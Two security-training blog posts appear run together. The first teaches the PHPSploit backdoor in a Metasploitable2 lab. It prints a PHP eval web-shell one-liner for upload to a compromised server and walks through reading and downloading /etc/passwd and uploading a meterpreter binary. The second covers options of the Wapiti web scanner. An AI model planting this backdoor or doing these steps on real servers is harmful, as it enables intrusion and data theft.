Category: Hacking

Hello, aspiring ethical hackers. In our previous blogpost, you have learnt what is backdoor. In this blogpost, you will learn about PHPSploit, a backdoor for web servers. PHPSploit is a fully featured command & control (C&C) framework that is used for persistence on web servers after gaining access. Let’s see how PHPSploit works and learn about its functions.

For this, we will be using Kali Linux as PHPSploit is available for download on Kali’s repositories by default. As target system, we will be using Metasploitable2 as part of our virtual hacking lab. Let’s see how it works.

PHPSploit can be started using the command shown below.

phpsploit

To place the PHPSploit backdoor on any target system, all you have to do is insert a PHP one liner into the code of the website. The PHP one liner is given below.

<?php @eval($_SERVER['HTTP-PHPSPLOIT']); ?>

I copy the above script into a PHP file named “bd.php” and upload this file to the target web server after web server hacking.

After uploading this file to the target web server, open PHPSploit on attacker system (Kali) and set the URL of the PHP backdoor as target as shown below. Then we have to run the command “exploit”. This gives us access as shown below.

Once the exploit is successful, the interface of PHPSploit shows the target IP address or the domain name on which we installed the backdoor. To view all the commands PHPSploit supports, type command “help”.

For example, let’s try “phpinfo” command that gives us the information about the web server.

To know the user account with whose privileges you compromised the target system, you have to use the “whoami” command.

PHPSploit also supports file system commands like cd, pwd, cat, ls etc.

Cat command can be used to view the contents of files on the target system. For example, let’s view the “/etc/passwd” file on the target Metasploitable2 system.

We can also download files from the target web server. For example, let’s download “/etc/passwd” file from the target system to the “/tmp” directory of our attacker system.

Here is the downloaded file.

Similarly, we can also upload files to the target system using the “upload” command. For example, let’s upload the meterpreter binary to the target system as shown below.

Hello, aspiring ethical hackers. In our previous blogpost on web application hacking and web server hacking, you learnt about various web vulnerabilities. In this blogpost, you will learn about Wapiti a web vulnerability scanner.

It is a very good practice to learn about the vulnerabilities and weaknesses in a website or web application before they hackers find bout them. Web vulnerability scanners play a very important role in detecting vulnerabilities. Wapiti is one such vulnerability scanner thats written in Python.

Unlike other vulnerability scanners, Wapiti works as a “Black Box” vulnerability scanner that instead of studying source code of the target web application, works by fuzzing and scanning the pages of web application, extract link forms, attacking the scripts, sending payloads, finding out error messages, special strings and other abnormal behaviours.

Let’s see how to find vulnerabilities using Wapiti. For this, we will be using Kali Linux as this tool is installed by default on Kali Systems. As target, we will be using Mutillidae web application on Metasploitable 2. See how to setup this virtual hacking lab.

The simplest way to use Wapiti is to just supply it with the target URL as shown below.

Then, Wapiti starts scanning the target as shown below.

Scope

Scope option of wapiti specifies it to what to scan. The scope option of wapiti takes four values: URL, page, folder, domain and punk. Here is the detailed explanation about these values.

1. URL: Setting this will only scan and attack the exact base URL given with -u option.
2. PAGE: Setting this as scope value will attack every URL matching the path of the base URL.
3. FOLDER: This will scan and attack every URL starting with the base URL value. This base URL should have a trailing slash (no file‐name).
4. DOMAIN: Setting this as scope value will scan and attack every URL whose domain name matches the one from the base URL.
5. PUNK: Setting this value will scan and attack every URL found whatever the domain. Think twice before using this for scope.

Let’s set the scope to “page” for now.

View all the modules (

Wapiti has many modules that help in vulnerability scanning. You can view all the modules using the “list modules” option.

Select a single module

You can select just a single module using the “-n” option. For example, let’s load the file module.

As you can see in the above image, a include vulnerability has been detected in the target web app.

Don’t resume the scan (–skip-crawl)

Sometimes, we abort a scanning session before it gets completed. When you start a new scan with Wapiti again, by default it resumes the aborted session by crawling the URLs again. If you don’t want to resume the previous scan from URL crawling, you can use this option. By using this option, Wapiti will attack only currently known URLs.

Resume from crawling

This option us useful in cases where the scan was previously aborted after wapiti started attacking. When a session is restored, the default behavior is to skip crawling. However, we can use this option to continue the scan process.

Flush attacks

This option specifies wapiti to forget everything about discovered vulnerabilities and which URL got attacked by which modules. Only the crawling information of the scan will be kept.

Flush session

This option specifies wapiti to forget everything about the target for the given scope.

Saving the output to a directory

Like many tools, you can save the output of the scan of wapiti in a report. This option enables you to specify a directory for saving the report of the scan.

Format of the reports (-f)

You can use this option to specify the format of the report. The reports can be saved in json, HTML, txt and xml. formats. For example, let’s set the report to be txt format.